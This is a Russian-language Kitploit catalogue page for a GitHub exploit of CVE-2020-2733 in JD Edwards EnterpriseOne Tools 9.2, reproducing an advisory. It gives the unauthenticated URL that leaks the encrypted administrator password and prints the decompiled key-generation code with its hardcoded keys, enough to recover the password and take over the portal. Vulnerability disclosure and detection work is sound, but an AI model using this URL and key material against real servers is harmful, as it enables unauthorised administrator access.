Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2020-2733 — Эксплойт для CVE-2020-2733 в JD Edwards EnterpriseOne Tools, демонстрирующий неаутентифицированную дешифровку пароля администратора и обход аутентификации для получения прав администратора. | Kitploit
Инструменты/GitHubGitHub/anmolksachan/cve-2020-2733
Инструменты шифрования/дешифрованияАтаки на ПаролиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на ПроникновениеНеправильная Конфигурация
GitHubanmolksachan/cve-2020-2733

CVE-2020-2733

Эксплойт для CVE-2020-2733 в JD Edwards EnterpriseOne Tools, демонстрирующий неаутентифицированную дешифровку пароля администратора и обход аутентификации для получения прав администратора.

122 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий

CVE-2020-2733 - Пароль администратора JD Edwards EnterpriseOne Tools недостаточно защищен

image
Рис. 1: Расшифровка строки
image
Рис. 2: Расшифровка по URL

[CVE-2020-2733]

Приложение: JD Edwards EnterpriseOne Tools
Затронутые версии: JD Edwards EnterpriseOne Tools 9.2
URL производителя: https://oracle.com/
Ошибка: Раскрытие информации
Сообщено: 18 сентября 2019 г.
Дата публичного уведомления: 23 августа 2022 г.
Ссылка: [https://www.oracle.com/security-alerts/cpuapr2020.html, https://redrays.io/cve-2020-2733-jd-edwards/]
Шаблон Nuclei для обнаружения: https://github.com/projectdiscovery/nuclei-templates/blob/68f0ad5fa2f54a08959e2d68633174750fcb4952/http/cves/2020/CVE-2020-2733.yaml#L2

Описание

ИНФОРМАЦИЯ ОБ УВЕДОМЛЕНИИ
Название: [CVE-2020-2733] Пароль администратора JD Edwards EnterpriseOne Tools недостаточно защищен
Риск: Критический
URL уведомления: https://redrays.io/cve-2020-6369-patch-bypass/
Дата публикации: 23.08.2022

ИНФОРМАЦИЯ ОБ УЯЗВИМОСТИ


Эксплуатируется удаленно: Да
Эксплуатируется локально: Нет


Информация CVSS: Базовый балл CVSS v3.1: 9.8 / 10 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

ОПИСАНИЕ УЯЗВИМОСТИ

JD Edwards EnterpriseOne Tools 9.2 или более низкие версии позволяют неавторизованным злоумышленникам обойти аутентификацию и получить права администратора в системе.

ТЕХНИЧЕСКОЕ ОПИСАНИЕ

Уязвимость была обнаружена на портале управления Oracle JD Edwards. Для воспроизведения уязвимости необходимо открыть (без аутентификации) следующий URL:

http://JDEdwards:8999/manage/fileDownloader?sec=1

При открытии URL на странице отображается псевдослучайный текст. unnamed-2-e1661254647723

root@kitploit:~
ACHCJKGJHCJKBLLALOLOJFCABEFHOALDDAOFNGGANPDB


Проанализировав jar-файлы JD Edwards, мы обнаружили, что эти псевдослучайные данные — это ЗАШИФРОВАННЫЙ ПАРОЛЬ АДМИНИСТРАТОРА!

Ключи шифрования находятся в следующей функции:

root@kitploit:~
private static void genKeys(byte[] paramArrayOfByte1, byte[] paramArrayOfByte2, byte paramByte)
{
int i = 0;
byte[] arrayOfByte1 = { 65, 4, 95, 12, 88, 41, 6, 114, 119, 93, 37, 68, 75, 19, 49, 46 };
byte[] arrayOfByte2 = { 107, 34, 26, 94, 68, 41, 119, 48, 3, 88, 28, 97, 5, Byte.MAX_VALUE, 77, 54 };
byte[] arrayOfByte3 = { 36, 89, 113, 109, 38, 15, 7, 66, 76, 115, 16, 53, 106, 94, 27, 56 };
int j = paramByte >> 4;
int k = paramByte & 0xF;
int m = arrayOfByte3[j];
for (i = 0; i < 16; i++) {
paramArrayOfByte1[i] = ((byte)(arrayOfByte1[i] ^ m));
}
m = arrayOfByte3[k];
for (i = 0; i < 16; i++) {
paramArrayOfByte2[i] = ((byte)(arrayOfByte2[i] ^ m));
}
}

В результате вы получите пароль администратора и сможете развернуть любое приложение на портале JD Edwards. image

Ссылка / Благодарности: https://redrays.io/blog/cve-2020-2733-jd-edwards/

Скачать инструмент